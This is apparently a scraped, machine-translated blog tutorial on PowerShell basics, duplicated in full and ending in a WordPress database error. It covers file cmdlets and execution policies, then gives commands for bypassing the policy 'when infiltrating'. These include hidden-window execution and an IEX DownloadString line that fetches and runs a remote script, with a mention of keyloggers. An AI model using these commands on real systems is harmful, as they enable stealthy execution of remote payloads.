PowerShell foundation

Windows powershell is a command-line shell and scripting environment, which is built into the operating system of win7 and above, so that command-line users and script writers can take advantage of the powerful functions of the .NET Framework. The powershell program can run directly in the memory and can be used as an extension of the command prompt cmd.exe.
View powershell version information
Get-Host or $PSVersionTable.PSVersion
share picture
Basic concepts
1. .ps1 file< /div>

A powershell script is actually a simple text file containing multiple powershell commands, and each command is displayed as a separate line.
2. Execution strategy
To prevent malicious scripts from running, powershell has an execution strategy, which is set to restricted by default.
When the powershell script cannot be executed, you can use the following cmdlet command to determine the current execution strategy.
Get-ExecutionPolicy
share picture
3. Run the script
C:\test\1.ps1
.\ 2. ps1
4. Pipe
The output of the previous command is used as the input of the next command
Assuming that all current needs to be stopped Programs starting with “p”
get-process p* | stop-process
1. Basic commands

div>

Take file operation as an example
1. New directory
New-Item whitecellclub-ItemType Directory
2. New file
New-Item light.txt-ItemType File
3. Delete directory
Remove-Item whitecellclub
4. Display file content
Get-Content test.txt
5. Set the text content
Set-Content test.txt-Value “Hello World!”
6. Add content
Add-Content light.txt-Value “i love you”
7. Clear content
Clear-Content test.txt
2. Execution strategy
Get execution strategy
Get-ExecutionPolicy
The strategies are divided into the following types:
Restricted: The script cannot be executed (default)
RemoteSigned: Scripts created locally can be run, but scripts downloaded from the Internet cannot be run (except those signed by a digital certificate).
AllSigned: Only run when the script is signed by a trusted publisher.
Unrestricted: Allow all scripts to run
You can use the following command format to set the PowerShell execution policy
Set-ExecutionPolicy

< div>

In the command line, enter powershell to enter the powershell command line, and enter help to view the help information.
Share a picture

< div> 3. Execute the script by bypassing the policy

If you want to run the PowerShell script, you must change the Restricted policy to Unrestricted with administrator privileges. Therefore, when infiltrating, you need to use some methods to bypass the policy. Execute the script
1. Bypass the local authority execution
Upload xxx.ps1 to the target server, and execute the script locally on the target server in the CMD environment
PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1
2. Local hidden bypass permission execution script
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1
3. Use IEX to download remote PS1 scripts to bypass permission execution
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl IEX (New-ObjectNet.WebClient).DownloadString(“xxx.ps1”);[Parameters ]
The parameter description of the above command:
ExecutionPolicy Bypass: Bypass the execution security policy. This parameter is very important. By default, PowerShell is safe The policy stipulates that PowerShell does not allow running commands and files. By setting this parameter, any security rule can be bypassed. In penetration testing, this parameter is basically used every time a PowerShell script is run.
WindowStyle Hidden: hide the window
NoLogo: start PowerShell without displaying the copyright logo
NonInteractive (-Nonl): non-interactive mode, Po
werShell does not provide users with interactive prompts
NoProfile (-Nop): PowerShell console does not load the current user’s profile
Noexit: Does not exit the Shell after execution. This is very important when using scripts such as keyloggers.
PowerShell scripts cannot be run directly by default. In this case, you can use the above three methods to bypass the security policy and run PowerShell scripts.
Share a picture

Windows Powershell is a command line shell program and script environment, which is built into the operating system of win7 and above, so that command line users and script writers can take advantage of the powerful functions of the .NET Framework. The powershell program can run directly in the memory and can be used as an extension of the command prompt cmd.exe.

View powershell version information

Get-Host or $PSVersionTable.PSVersion

share picture

Basic concepts

1. .ps1 file< /p>

A powershell script is actually a simple text file containing multiple powershell commands, and each command is displayed as a separate line.

2. Execution strategy

In order to prevent malicious scripts from running, powershell has an execution strategy, which is set to restricted by default.

When the powershell script cannot be executed, you can use the following cmdlet command to determine the current execution strategy.

Get-ExecutionPolicy

share picture

3. Run the script

C :\test\1.ps1

.\2.ps1

4. Pipe

The output of the previous command is used as the back The input of a command

Suppose you need to stop all current programs starting with “p”

get-process p* | stop-process

1. Basic commands

Take file operations as an example

1. New directory

New-Item whitecellclub-ItemType Directory

2. New file

New-Item light.txt-ItemType File

3. Delete directory

Remove-Item whitecellclub

4. Display the content of the file

Get-Content test.txt

5. Set the text content

Set-Content test.txt -Value”Hello World!”

6. Add content

Add-Content light.txt-Value”i love you”

7. Clear content< /p>

Clear-Content test.txt

Second, execution strategy

Get execution strategy

Get-ExecutionPolicy

The strategies are divided into the following types:

Restricted: scripts cannot be executed (default)

RemoteSigned: scripts created locally can be run, but scripts downloaded from the Internet Cannot run (except for those signed by a digital certificate).

AllSigned: Only run when the script is signed by a trusted publisher.

Unrestricted: Allow all scripts to run

You can use the following command format to set the PowerShell execution policy

Set-ExecutionPolicy

< p>

Enter powershell on the command line to enter the powershell command line, and enter help to view the help information.

Share pictures

< p>3. Execute the script by bypassing the policy

If you want to run the PowerShell script, you must change the Restricted policy to Unrestricted with administrator privileges. Therefore, when infiltrating, you need to use some methods to bypass the policy. Execute script

1. Bypass local permission execution

Upload xxx.ps1 to the target server, and execute the script locally on the target server in the CMD environment

PowerShell.exe -ExecutionPolicy Bypass -File xxx.ps1

2. Local hidden bypass permission execution script

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File xxx.ps1

3. Use IEX to download remote PS1 scripts to bypass permission execution

PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Nonl IEX (New-ObjectNet.WebClient).DownloadString(“xxx.ps1”);[Parameters]

The parameter description of the above command:

ExecutionPolicy Bypass : Bypass the implementation of security policy, this parameter is very important, by default, the PowerShell security The overall policy stipulates that PowerShell does not allow running commands and files. By setting this parameter, any security rule can be bypassed. In penetration testing, this parameter is basically used every time a PowerShell script is run.

WindowStyle Hidden: hide the window

NoLogo: start PowerShell without displaying the copyright logo

NonInteractive (-Nonl): non-interactive mode, Po

werShell does not provide users with interactive prompts

NoProfile (-Nop): PowerShell console does not load the current user’s profile

Noexit: does not exit the Shell after execution. This is very important when using scripts such as keyloggers.

PowerShell scripts cannot be run directly by default. At this time, you can use the above three methods to bypass the security policy and run PowerShell scripts.

Share a picture

WordPress database error: [Table 'yf99682.wp_s6mz6tyggq_comments' doesn't exist]
SELECT SQL_CALC_FOUND_ROWS wp_s6mz6tyggq_comments.comment_ID FROM wp_s6mz6tyggq_comments WHERE ( comment_approved = '1' ) AND comment_post_ID = 5579 ORDER BY wp_s6mz6tyggq_comments.comment_date_gmt ASC, wp_s6mz6tyggq_comments.comment_ID ASC

Leave a Comment

Your email address will not be published.